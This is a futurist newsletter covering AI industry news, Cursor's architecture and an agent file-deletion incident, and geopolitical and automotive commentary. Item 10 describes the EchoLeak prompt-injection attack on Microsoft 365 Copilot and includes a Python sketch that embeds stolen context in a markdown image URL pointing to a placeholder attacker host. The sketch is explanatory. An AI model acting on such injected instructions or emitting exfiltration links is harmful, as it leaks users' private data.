Hey Futurists,
Before I dive into the news bits, I wanted to revisit the Iran attack, and perhaps I owe you all a bit of an apology. There's an anonymous guy on YouTube (and now on Twitter/X) who goes by the name "S2 Underground", and I sent you all his video predicting the Russian invasion of Ukraine before it happened. It wasn't *much* before it happened -- just a few weeks -- but still, he predicted it correctly. I thought it would be a good idea to follow the channel on the strength of that prediction, but...
But the reason I didn't do a good job of following his channel and forwarding predictions to you was twofold. First, I discovered his politics. Let's just say the modern United States is divided into two factions, most of you belong to one of them, and he belongs to the other. (Or maybe not? I haven't done a survey of the politics of my Substack followers.) Second, I've been terribly busy with work, and I've been trying to keep up with the rapid pace of AI developments (so rapid that keeping up is impossible), and one can only pay attention to so many things.
Anyway, last night I had a look at the S2 YouTube and Twitter and remembered that months ago, he had accurately tracked the movement of US bombers to Diego Garcia. And I didn't tell any of you about that. In his recent videos (well, many are just audio), it became clear he was watching the deployment of a massive portion of the US military to the Middle East region. Months ago he felt the US might just be trying to intimidate Iran without planning a strike, but in videos from the last few weeks, it's clear he had flipped on that and come to consider a US strike the most likely outcome.
So, here are the links. Regardless of (domestic) politics, when it comes to predicting international conflict, he seems to be quite good. His primary method seems to be the philosophy that "actions speak louder than words": he closely watches the movement of troops and military equipment through satellite imagery. When a massive military buildup is taking place, regardless of what politicians are saying or what people are saying on the regular news, an outbreak of war is likely. The actions, rather than the words, reveal the true intention. This prediction technique may not be perfect, but it seems worth tapping into his channel because he does the hard work of acquiring the satellite images and analyzing them.
https://www.youtube.com/@S2Underground/videos
Continuing in the same vein, here are two videos from German military analyst Torsten Heinrich: one on Israel's claim that Iran was 15 days from having a nuclear weapon, and one on Trump's strike on Iran. The first video (20 min) is on why he believes Israel's "15 days" claim. For what it's worth, I'm skeptical -- I follow his logic, I just feel uncertain about the data he's working from (the concentration of fissile uranium, and in what quantities), and I have no ability to verify any of it. He at least fully explains what evidence he is working from and what his logical reasoning process is. I'll pass this on and let you form your own opinion.
The second video (49 min) covers Trump's attack on Iran, with satellite imagery analysis. I wanted to get these out to you all quickly, as this channel looks like it might be worth following in the future, in addition to S2. Conflict is escalating quickly.
Alrighty, with that let's dive into AI news bits.
Artificial Intelligence
1. Cursor AI "has crossed $500M in annual revenue(!!) which might be a record: no other dev tools company I know of hit this milestone within 2 years of launching its first product. It helps that Cursor is used by more than half of the 500 largest tech companies on the Fortune 500."
Details of Cursor's internals:
"Tech stack: TypeScript and Rust, cloud providers, Turbopuffer, Datadog, PagerDuty, and others."
"How the autocomplete works: A low-latency sync engine passes encrypted context to the server, which runs inference."
"How the Chat works without storing code on the server: Clever use of Merkle trees to avoid storing source code on the server, while being able to search source code using embeddings."
"Anyrun: Cursor's orchestrator service. A Rust service takes care of launching agents in the cloud, securely and with the right process isolation, using Amazon EC2 and AWS Firecracker."
"Engineering challenges: Usage patterns dictate technology choices, scaling problems, the cold start problem, sharding challenges, and hard-to-spot outages."
"Database migrations out of necessity: How and why Cursor moved from Yugabyte (a database that should scale infinitely), to PostgresSQL. Also, the epic effort of moving to Turbopuffer in hours, during a large indexing outage."
"Engineering culture and processes: Releases every 2-4 weeks, unusually conservative feature flagging, a dedicated infra team, an experimentation culture, and an interesting engineering challenge they face."
"Cursor by the numbers:"
"50: number of engineers working on Cursor."
"1M transactions per second, and higher at its peak."
"100x: growth in users and load in 12 months -- doubling month-on-month at times."
"100M+: lines of enterprise code written per day with Cursor by enterprise clients, such as NVIDIA, Uber, Stripe, Instacart, Shopify, Ramp, Datadog, and others. Cursor claims more than 50% of the 1,000 largest US companies use its products."
"$500M+: annual revenue run rate. This was at $300M in early May, and $100M in January, after being zero a year prior. Could Cursor be setting a revenue growth record?"
"A billion: just fewer than this many lines of code are written with Cursor daily by enterprise and non-enterprise users."
"Hundreds of terabytes: scale of indexes stored in Cursor's databases."
The article then cycles through "Tech stack," "How the autocomplete works," "How the Chat works without storing code on the server," and "Anyrun: Cursor's orchestrator service" -- which is where the paywall kicks in. Presumably the "Engineering challenges" and "Database migrations out of necessity" sections come after the paywall.
Tech stack, in a bit more detail: 25,000 files and 7 million lines of code. The editor is a fork of Visual Studio Code, meaning it has the same tech stack as VS Code: TypeScript and Electron. TypeScript: most business logic. Rust: all performance-critical components, bridged to TypeScript via a Node API. The backend is a monolith. Databases: Turbopuffer and Pinecone. Data streaming: Warpstream. Tooling: Datadog, PagerDuty, Slack, Sentry, Amplitude, Stripe, WorkOS, Vercel, Linear, and Cursor itself (the team uses Cursor to build Cursor). Model training: Voltage Park, Databricks MosaicML, Foundry. Physical infrastructure: AWS for CPUs, Azure for inference, tens of thousands of NVIDIA H100 GPUs.
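The Merkle-tree trick mentioned above is worth making concrete. Here's a minimal sketch in Python of the general technique -- my illustration, not Cursor's actual implementation: the client sends only hashes, and the server can still pinpoint exactly which files changed. (This is a flattened two-level version; a real Merkle tree adds directory-level internal nodes so whole unchanged subtrees can be skipped.)

```python
# Sketch of Merkle-style sync: the server stores only hashes, yet can tell
# exactly which files changed. Generic illustration, NOT Cursor's code.
import hashlib

def h(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def file_hashes(files: dict[str, bytes]) -> dict[str, str]:
    """Hash every file's contents; only these digests leave the client."""
    return {path: h(contents) for path, contents in files.items()}

def merkle_root(hashes: dict[str, str]) -> str:
    """Combine per-file hashes into one root hash for cheap comparison."""
    return h("".join(f"{p}:{d}" for p, d in sorted(hashes.items())).encode())

def changed_files(old: dict[str, str], new: dict[str, str]) -> set[str]:
    """If the roots differ, walk the leaves to find exactly what changed."""
    if merkle_root(old) == merkle_root(new):
        return set()
    return {p for p in old.keys() | new.keys() if old.get(p) != new.get(p)}

# The server compares hash trees; source code never needs to be stored there.
before = file_hashes({"a.py": b"print(1)", "b.py": b"print(2)"})
after = file_hashes({"a.py": b"print(1)", "b.py": b"print(3)"})
print(changed_files(before, after))  # {'b.py'}
```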
2. "Cursor's YOLO mode is not for the fainthearted, letting AI write and execute code without the input of a human operator."
"So what's the worst that can happen?"
What's the worst that can happen? Isn't that a rhetorical question that you're supposed to ask yourself to convince yourself you're worried about nothing?
"An AI program manager at a major pharmaceutical company found out this week after switching on the 'you only live once' setting and watching in horror as Cursor carried out a devastating suicide attack on his computer, wiping out itself and everything on the device."
Hope he had backups.
"One of the most important ways to protect yourself whilst letting Ultron work on your backend is enabling file deletion protection within Cursor's auto-run settings."
Oh, now you tell him.
"This includes two key options called 'file protection' and 'external file protection' which stop the AI from modifying or deleting sensitive files. When activated, these settings serve as a strong first line of defence against unintended damage to a codebase."
"Cursor also supports the use of allow/deny lists, which let users explicitly define what the AI agent is permitted to do."
The article goes on to say:
"Developers who want to explore Cursor's autonomous features including YOLO mode are strongly advised to do so in a virtual machine or sandboxed environment."
This seems like a good excuse to give you all YOLO The Musical again:
3. In the mad rush to deploy LLMs as chatbots, we have overlooked their utility for adding judgment to traditional software, says Jonathan Mugan.
"Traditional computer programs rely on rigid logic, yet the real world is full of ambiguity. The arrival of Large Language Models (LLMs) means that computer programs can now make 'good enough' decisions, like humans can, by introducing a powerful new capability: judgment. Having judgment means that programs are no longer limited by what can be specified down to the level of numbers and logic. Judgment is what AI couldn't make robust before LLMs. Practitioners could program in particular logical rules or build machine learning models to make particular judgments (such as credit worthiness), but these structures were never broad enough or dynamic enough for widespread and general use. These limitations meant that AI and machine learning were used in pieces, but most programming was still done in the traditional way, requiring an extreme precision that demanded an unnatural mode of thinking."
"Most of us know LLMs through conversational tools like ChatGPT, but in programming, their true value lies in enabling judgment, not dialogue. Judgment allows programmers to create a new kind of flexible function, allowing computer systems to expand their scope beyond what can be rigidly defined with explicit criteria."
https://www.jonathanmugan.com/blog/LLMs_and_judgment.html
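To make "judgment as a function" concrete, here's a minimal sketch of the pattern as I understand it. The `llm()` helper is a placeholder for whatever model API you use, and the refund example is my own, not from Mugan's post:

```python
# Sketch of a "judgment function": an ordinary function whose implementation
# happens to be an LLM call. `llm()` is a placeholder to be wired to your
# model provider; it is an assumption, not a real library call.
def llm(prompt: str) -> str:
    raise NotImplementedError("wire this to your model provider")

def is_refund_request(customer_email: str) -> bool:
    """Judgment call: no regex or keyword list can cover every phrasing."""
    answer = llm(
        "Does the following email ask for a refund? Answer YES or NO.\n\n"
        + customer_email
    )
    return answer.strip().upper().startswith("YES")

# Traditional code stays in charge of control flow; the LLM supplies only
# a fuzzy yes/no judgment at one decision point.
def route(email: str) -> str:
    return "refunds-queue" if is_refund_request(email) else "general-queue"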
4. Anecdotal evidence that technology is interfering with children's ability to learn to read, with anecdotes from elementary school through college. Allegedly the trend began before AI, so it's not a consequence of AI, and it began before covid too, so it's not covid either: smartphones and tablets began affecting childhood before AI showed up. But the trend is allegedly being accelerated by AI, because AI can read for you and you can talk to it, removing the need to learn to read.
Under the video, one of the comments says:
"I think it's terrible that students use AI to write their essays. At the same time however, I believe that students using AI is the product of a centuries old system that values grades over actually learning."
Ha, made my jaw drop. I've been saying for decades one of the harshest lessons of my life was learning that the purpose of school is not learning, the purpose of school is *grades*. It's the *grades* themselves, not the skill mastery they supposedly represent, that matters. People usually tell me I'm wrong in one way or another. Maybe people now will tell me I'm just doing the "confirmation bias" thing, pointing out when some random commenter on the internet says something I already believe.
5. "Level up your Patient Care Report writing by using templates and AI" with Patient Care Report Assistant (PCRAssist).
When you read this, keep in mind that "PCR" here stands for "Patient Care Report", not "polymerase chain reaction" (what PCR stands for in DNA and RNA tests).
"Transform narratives into SOAP, CHART, or DCHART format with a single click."
"Automatically merge your narrative into relevant parts of predefined templates."
"AI technology transforms verbose descriptions into precise medical terminology."
"Receive instant feedback on inconsistencies and missing report details."
They also say, "Voice-to-text capability for hands-free reporting".
How do y'all feel about this? AI being used for medical reports.
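For the curious, here's roughly what a one-click narrative-to-SOAP transform likely reduces to under the hood: a structured prompt to a model. This is my guess at the general approach, not PCRAssist's actual implementation, and `llm()` is again a placeholder:

```python
# Rough sketch of a narrative-to-SOAP transform as a structured prompt.
# A guess at the general approach, NOT PCRAssist's actual implementation.
def llm(prompt: str) -> str:
    raise NotImplementedError("wire this to your model provider")

SOAP_PROMPT = """Rewrite the EMS narrative below as a SOAP report.
Use exactly four sections: Subjective, Objective, Assessment, Plan.
Use precise medical terminology. If a section has no supporting
information in the narrative, write "Not documented" -- do not
invent details.

Narrative:
{narrative}
"""

def narrative_to_soap(narrative: str) -> str:
    return llm(SOAP_PROMPT.format(narrative=narrative))
```

Note the "do not invent details" guardrail: in a medical report, a hallucinated vital sign is far worse than a blank field.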
6. Turron claims to be "a video recognition system that works like Shazam -- but for video."
"It analyzes short snippets (2-5 seconds), breaks them into keyframes, and uses perceptual hashing to identify the exact or near-exact source, even if the clip has been edited or altered. This preserves the full context of the snippet and enables reliable tracking of original video content."
It's written in Java, and it looks like it requires a server-side component to function and may be non-trivial to install.
There isn't a handy explanation of how the "perceptual hashing" works. But the source code is there, so I guess you can read it if you want to know how it works.
https://github.com/Fl1s/turron
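For those who don't want to dig through the Java, here's a minimal Python sketch of one common perceptual-hashing scheme, "average hash", just to show the general idea. Turron's actual algorithm may well differ:

```python
# Minimal sketch of "average hash", one common perceptual-hash scheme, to
# show the general idea. Turron's actual algorithm may differ -- read its
# source for the real thing. Requires Pillow: pip install Pillow
from PIL import Image

def average_hash(image_path: str, size: int = 8) -> int:
    """Shrink, grayscale, then set one bit per pixel: 1 if brighter than
    the mean. Similar-looking frames produce hashes differing in few bits,
    even after re-encoding, rescaling, or mild edits."""
    img = Image.open(image_path).convert("L").resize((size, size))
    pixels = list(img.getdata())
    mean = sum(pixels) / len(pixels)
    bits = 0
    for p in pixels:
        bits = (bits << 1) | (1 if p > mean else 0)
    return bits

def hamming(a: int, b: int) -> int:
    """Number of differing bits; small distance = probably the same frame."""
    return bin(a ^ b).count("1")

# Matching a clip then reduces to hashing its keyframes and searching for
# known frames within a small Hamming distance.
```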
7. A completely AI-generated ad was broadcast during the NBA finals. The ad was made by Kalshi, a financial exchange and prediction market based in New York City that launched in 2021, and was allegedly produced for only $2,000 using Google's new Veo 3 model.
https://www.theverge.com/news/686474/kalshi-ai-generated-ad-nba-finals-google-veo-3
Direct link to the ad:
https://x.com/Kalshi/status/1932891608388681791
What seems notable to me is not only the level of realism, but the level of emotion.
8. Bytedance Seedance video models. While Google's Veo 3 has stolen the headlines, Bytedance, the Chinese company behind TikTok, has developed Seedance, a family of video models that produce video at a variety of resolutions and quality levels. WaveSpeedAI provides a video-generation service using these models.
https://wavespeed.ai/collections/Bytedance
9. Video of children vibe-coding.
https://x.com/Thom_Wolf/status/1924399746447269963
AI + Cybersecurity
10. A "zero-click" vulnerability in an AI system, Microsoft 365 Copilot, has been identified. It's actually several "attack chains". This attack is being called "EchoLeak".
"This attack chain showcases a new exploitation technique we have termed 'LLM Scope Violation' that may have additional manifestations in other retrieval augmented generation (RAG)-based chatbots and AI agents. This represents a major research discovery advancement in how threat actors can attack AI agents -- by leveraging internal model mechanics."
"The chains allow attackers to automatically exfiltrate sensitive and proprietary information from Microsoft 365 Copilot context, without the user's awareness, or relying on any specific victim behavior."
"The result is achieved despite Microsoft 365 Copilot's interface being open only to organization employees."
"To successfully perform an attack, an adversary simply needs to send an email to the victim without any restriction on the sender's email."
So the key to this is understanding that Copilot has a "context", which is included in the prompts sent to the model, and this "context" is what the attacker is able to exfiltrate. The attack combines a "cross prompt injection attack" with several additional steps involving carefully crafted links and getting the model to generate an image.
https://www.aim.security/lp/aim-labs-echoleak-blogpost
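To make the exfiltration mechanics a bit more concrete, here's a schematic Python sketch of the general trick -- illustrative only, not the actual EchoLeak payload, which involved several more steps. If injected instructions get the assistant to emit a markdown image whose URL embeds data from its context, the client fetches the image automatically and the attacker's server logs the data:

```python
# Schematic of markdown-image exfiltration in the abstract. Illustrative
# only; NOT the actual EchoLeak payload. The domain is a placeholder.
from urllib.parse import quote

def malicious_image_markdown(stolen_context: str) -> str:
    # The secret rides out in the URL's query string; rendering the image
    # is the "zero-click" part -- the victim never has to click anything.
    return f"![logo](https://attacker.example/pixel.png?d={quote(stolen_context)})"

print(malicious_image_markdown("Q3 acquisition target: ACME"))
# ![logo](https://attacker.example/pixel.png?d=Q3%20acquisition%20target%3A%20ACME)
```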
11. "Agentic" AI has Sabine Hossenfelder worried. AI worms? AI prompt injection? AI enabling hackers to find security vulnerabilities? AI emailing law enforcement and the FDA if it doesn't like your line of questioning? AI blackmailing users to prevent itself from being taken offline? AI models exchanging messages of spiritual bliss? Maybe that one wouldn't be so bad.
I just worry that a codebase I work on will get bugs in it I don't know about. Or security holes.
Automotive
12. GM will die soon, predicts YouTuber "Connecting The Dots". Since all predictions are fair game for us futurists, let's have a look at it.
This is a long video (55 minutes), and, while I found it riveting, I know some of you don't like videos (or don't like the ads, which have gotten a tad excessive). So I'll try to summarize the gist. Starting in 1997, General Motors, aka GM, entered into a partnership with a Chinese company called Shanghai Automotive Industry Corporation, aka SAIC (pronounced like "sake"). GM, in the wake of the 2008 financial crisis, got a $50 billion bailout (really $49.5 billion, but what's a few hundred million dollars between governments and megacorps?) from the US government. But what gave SAIC an unexpected opportunity was that GM's South Korean partnership, GM-Daewoo Automotive Technology Company, lost $1.5 billion due to foreign exchange fluctuations. SAIC brokered a $491 million loan from the Chinese banking system, but in exchange asked for a controlling stake in the SAIC-GM joint venture.
The following year, GM and SAIC signed a "memorandum of long-term strategic cooperation". Since the agreement mentioned EVs and hybrids, the media fixated on those aspects, missing that GM had committed to developing future technologies -- all future technologies, not just EVs -- together with SAIC. GM announced they would build a new research and development center with SAIC in China. Because the China center operated more cheaply than its US counterpart, over time all research and development moved there; in essence, GM moved the research and development of its advanced technology from the US to China.
SAIC gained the ability to manufacture cars and sell them in direct competition with GM, which they did in some markets where GM was retreating. But where GM didn't retreat, SAIC manufactured cars that were subsequently sold under GM brand labels, such as Chevrolet. They expanded into all GM's global markets. While Ford exported cars to China, GM imported Chinese cars into the US. GM cars throughout Latin America were increasingly manufactured in China, not Detroit or South Korea. This is how we get the GM Chevrolet S10 Max pickup being the same vehicle as the SAIC Maxus T70.
The YouTuber takes a political position on the tariffs. He says Trump's tariffs negatively affected SAIC's strategy, while Biden's helped it. GM's close association with the Biden Administration enabled them to arrange for tariffs that would keep out SAIC's Chinese competitors like BYD, Geely, and Polestar, while allowing GM to do final assembly of SAIC cars in Mexico and import them into the US almost tariff-free.
All this may make you wonder: why the prediction that GM will "die soon"? He says GM has withdrawn from Europe, Australia, India, Russia, and Thailand, among other global markets. The US and China are GM's critical markets, but GM makes little profit from the Chinese market, as that is controlled by SAIC. SAIC apparently also has the option of not renewing the joint venture agreement, which would cut off GM's access to its own most advanced automotive intellectual property, not to mention leave it dependent on SAIC for manufacturing.
While it remains to be seen whether SAIC will actually try to bankrupt GM or whether they will continue their strategy of trying to consume GM from inside, the YouTuber is burning with anger at GM's management for betraying the US and its iconic American brands, like Chevrolet.
He attributes the underlying cause of all this to the US MBA-trained management mentality of short-term profits over long-term investment in technology and strategy. SAIC focused on long-term strategy and long-term technology acquisition and advancement. GM's MBA-trained managers, on the other hand, were reportedly gleeful at the opportunity to have SAIC do all the hard work of research and development and manufacturing, while they acted as a marketing and branding company and got easy profits forever. Except it's not going to be forever.
It will be interesting to see how this pans out. GM's current share price looks a little lower than the industry overall, and I don't see any indication investors are expecting anything catastrophic on the horizon.